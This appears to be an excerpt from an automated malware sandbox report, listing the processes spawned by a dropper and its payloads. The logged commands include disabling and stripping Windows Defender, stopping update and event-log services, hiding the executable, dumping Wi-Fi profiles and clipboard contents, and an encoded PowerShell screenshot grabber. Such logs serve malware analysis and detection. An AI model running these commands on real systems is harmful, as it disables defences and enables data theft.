Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\47SXvEQ.exe	Process created: C:\Users\user\AppData\Local\Temp\instals.exe "C:\Users\user\AppData\Local\Temp\instals.exe"	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Process created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "NPYIAYNC"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "NPYIAYNC"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\ProgramData\Microsoft\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\Microsoft\svchost.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft\svchost.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft\svchost.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft\svchost.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft\svchost.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft\svchost.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft\svchost.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft\svchost.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft\svchost.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft\svchost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\svchost.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAG